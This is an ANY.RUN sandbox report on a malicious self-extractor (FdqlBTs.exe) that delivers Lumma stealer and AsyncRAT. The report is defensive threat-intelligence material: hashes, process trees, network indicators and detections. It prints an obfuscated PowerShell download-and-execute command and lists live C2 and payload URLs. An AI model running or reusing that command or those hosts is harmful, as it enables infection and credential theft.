File name:

FdqlBTs.exe

Full analysis: https://app.any.run/tasks/cf888072-d998-4ae8-b5b9-a0cad8a418bd
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.

Malware Trends Tracker     >>>
Analysis date: March 24, 2025, 21:03:33
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
stegocampaign
stealer
lumma
rat
asyncrat
remote
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 6 sections
MD5:

1B129D080655A4C9F703A5DCE0195512

SHA1:

9EC187C55FC3F50D98C372A96913FD38462C4EBF

SHA256:

EE5C9B3DC922C0D16FD7A1E1D72C3530F9AEE1209A233764F8280EE7DBC3B353

SSDEEP:

6144:Po1GDF7f25lw/lJj2LnT25qndIjjVV8qtynD:Po1G57u5lw/qLnT25qndIPVVRtyD

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • STEGOCAMPAIGN has been detected

      • powershell.exe (PID: 8048)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 8048)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 8048)

    • Execute application with conhost.exe as parent process

      • powershell.exe (PID: 7372)

    • LUMMA mutex has been found

      • RegAsm.exe (PID: 7344)

    • Gets information about running processes via WMI (SCRIPT)

      • wscript.exe (PID: 7380)

    • Connects to the CnC server

      • powershell.exe (PID: 7372)

    • Actions looks like stealing of personal data

      • RegAsm.exe (PID: 7344)

    • Steals credentials from Web Browsers

      • RegAsm.exe (PID: 7344)

    • ASYNCRAT has been detected (SURICATA)

      • powershell.exe (PID: 7372)

  • SUSPICIOUS

    • Process drops legitimate windows executable

      • FdqlBTs.exe (PID: 7704)

    • Starts CMD.EXE for commands execution

      • FdqlBTs.exe (PID: 7704)

    • Executing commands from a ".bat" file

      • FdqlBTs.exe (PID: 7704)

    • Uses WMIC.EXE to obtain CPU information

      • cmd.exe (PID: 7724)

    • Starts a Microsoft application from unusual location

      • FdqlBTs.exe (PID: 7704)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 7724)
      • powershell.exe (PID: 7944)
      • conhost.exe (PID: 7276)

    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 7724)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7944)
      • powershell.exe (PID: 8048)

    • Application launched itself

      • powershell.exe (PID: 7944)

    • Get information on the list of running processes

      • powershell.exe (PID: 7944)

    • Probably download files using WebClient

      • powershell.exe (PID: 7944)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 8048)

    • The process executes JS scripts

      • cmd.exe (PID: 7724)

    • Creates an object to access WMI (SCRIPT)

      • wscript.exe (PID: 7380)

    • Executed via WMI

      • conhost.exe (PID: 7276)

    • There is functionality for taking screenshot (YARA)

      • RegAsm.exe (PID: 7344)

    • Contacting a server suspected of hosting an CnC

      • powershell.exe (PID: 7372)

    • Searches for installed software

      • RegAsm.exe (PID: 7344)

  • INFO

    • The sample compiled with english language support

      • FdqlBTs.exe (PID: 7704)

    • Create files in a temporary directory

      • FdqlBTs.exe (PID: 7704)
      • powershell.exe (PID: 8048)

    • Checks supported languages

      • FdqlBTs.exe (PID: 7704)
      • RegAsm.exe (PID: 7344)

    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 7780)
      • powershell.exe (PID: 8048)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 7944)

    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 7944)

    • Reads the software policy settings

      • powershell.exe (PID: 8048)
      • RegAsm.exe (PID: 7344)
      • slui.exe (PID: 5800)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 7944)

    • Disables trace logs

      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7372)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7372)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 8048)

    • Checks proxy server information

      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7372)
      • slui.exe (PID: 5800)

    • Reads the machine GUID from the registry

      • RegAsm.exe (PID: 7344)

    • Reads the computer name

      • RegAsm.exe (PID: 7344)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7372)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2090:06:11 09:36:52+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.26
CodeSize: 32768
InitializedDataSize: 163840
UninitializedDataSize: -
EntryPoint: 0x8460
OSVersion: 10
ImageVersion: 10
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 11.0.20348.1
ProductVersionNumber: 11.0.20348.1
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Microsoft Corporation
FileDescription: Win32 Cabinet Self-Extractor
FileVersion: 11.00.20348.1 (WinBuild.160101.0800)
InternalName: Wextract
LegalCopyright: © Microsoft Corporation. All rights reserved.
OriginalFileName: WEXTRACT.EXE .MUI
ProductName: Internet Explorer
ProductVersion: 11.00.20348.1
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
137
Monitored processes
14
Malicious processes
7
Suspicious processes
1

Behavior graph

Click at the process to see the details
start fdqlbts.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs find.exe no specs powershell.exe no specs #STEGOCAMPAIGN powershell.exe svchost.exe regasm.exe no specs #LUMMA regasm.exe wscript.exe no specs conhost.exe no specs #ASYNCRAT powershell.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
5800C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7276conhost --headless powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)C:\Windows\System32\conhost.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7288"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Version:
4.8.9037.0 built by: NET481REL1
7344"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\regasm.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
7372powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
conhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
7380"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\IXP000.TMP\2.js" C:\Windows\System32\wscript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
7704"C:\Users\admin\Desktop\FdqlBTs.exe" C:\Users\admin\Desktop\FdqlBTs.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Win32 Cabinet Self-Extractor
Exit code:
0
Version:
11.00.20348.1 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\desktop\fdqlbts.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
7724cmd.exe /c 1.bat && 2.jsC:\Windows\System32\cmd.exeFdqlBTs.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
7732\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
24 012
Read events
24 010
Write events
2
Delete events
0

Modification events

(PID) Process:(7724) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids
Operation:writeName:JSFile
Value:
(PID) Process:(7380) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation:writeName:JScriptSetScriptStateStarted
Value:
F220110000000000
Executable files
0
Suspicious files
2
Text files
9
Unknown types
0

Dropped files

PID
Process
Filename
Type
7944powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pbwasygv.qvs.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8048powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1gptron2.3gh.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8048powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0qzrzqdo.nqe.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8048powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_klz5xj50.c2l.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7704FdqlBTs.exeC:\Users\admin\AppData\Local\Temp\IXP000.TMP\1.battext
MD5:F6A8B35F102210019DCE8177B1DF901C
SHA256:1F0AEE2640D4748C088BD4AA0B8BEF5323ADD0778731FDFD3FA4D12ADDA1487B
7704FdqlBTs.exeC:\Users\admin\AppData\Local\Temp\IXP000.TMP\2.jsbinary
MD5:FAE294BEEEA146FCC79C6BA258159550
SHA256:0DB879398B091AAA19FE58C398B589C47A9E78194600CFDFF150C50F4EF40E31
7372powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_v0zsuqdb.dod.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7372powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sijntjuw.pqc.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7944powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yqrh2jj5.0u5.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8048powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hzsu14x4.mzs.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
14
TCP/UDP connections
29
DNS requests
12
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6392
RUXIMICS.exe
GET
200
2.19.11.120:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
POST
500
20.83.72.98:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
whitelisted
POST
200
104.21.78.80:443
https://soliduso.digital/QUDis
unknown
binary
68 b
POST
200
172.67.218.154:443
https://soliduso.digital/QUDis
unknown
binary
43 b
POST
200
104.21.78.80:443
https://soliduso.digital/QUDis
unknown
binary
68 b
POST
200
172.67.218.154:443
https://soliduso.digital/QUDis
unknown
binary
68 b
GET
200
185.199.110.153:443
https://ofice365.github.io/1/test.jpg
unknown
image
5.48 Mb
GET
200
192.96.205.175:443
https://shivalikhyundai.co.in/images/cdghaah.txt
unknown
text
492 Kb
POST
500
20.83.72.98:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
whitelisted
7372
powershell.exe
GET
302
185.250.151.155:80
http://ebmmnhkldkhdlbk.top/bn68qiewjfhtr.php?id=DESKTOP-JGLLJLD&key=74532125735&s=flibabc11
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
6392
RUXIMICS.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4
System
192.168.100.255:137
unknown
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4
System
192.168.100.255:138
unknown
6392
RUXIMICS.exe
2.19.11.120:80
crl.microsoft.com
Elisa Oyj
NL
unknown
8048
powershell.exe
185.199.108.153:443
ofice365.github.io
FASTLY
US
unknown
8048
powershell.exe
192.96.205.175:443
shivalikhyundai.co.in
LEASEWEB-USA-WDC
US
unknown
7344
RegAsm.exe
172.67.218.154:443
soliduso.digital
CLOUDFLARENET
US
unknown
7372
powershell.exe
2.58.15.254:80
baredaseco.pro
ASN-QUADRANET-GLOBAL
NL
unknown
7372
powershell.exe
185.250.151.155:80
ebmmnhkldkhdlbk.top
MIRholding B.V.
US
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
unknown
google.com
  • 216.58.206.78
unknown
crl.microsoft.com
  • 2.19.11.120
  • 2.19.11.105
unknown
ofice365.github.io
  • 185.199.108.153
  • 185.199.109.153
  • 185.199.110.153
  • 185.199.111.153
unknown
shivalikhyundai.co.in
  • 192.96.205.175
unknown
soliduso.digital
  • 172.67.218.154
  • 104.21.78.80
unknown
baredaseco.pro
  • 2.58.15.254
unknown
ebmmnhkldkhdlbk.top
  • 185.250.151.155
unknown
4xqqasqjdti51qa.com
unknown
activation-v2.sls.microsoft.com
  • 40.91.76.224
unknown

Threats

PID
Process
Class
Message
7372
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
2196
svchost.exe
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
7372
powershell.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
7372
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
7372
powershell.exe
Malware Command and Control Activity Detected
ET MALWARE AsyncRAT Victim Checkin
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
FdqlBTs.exe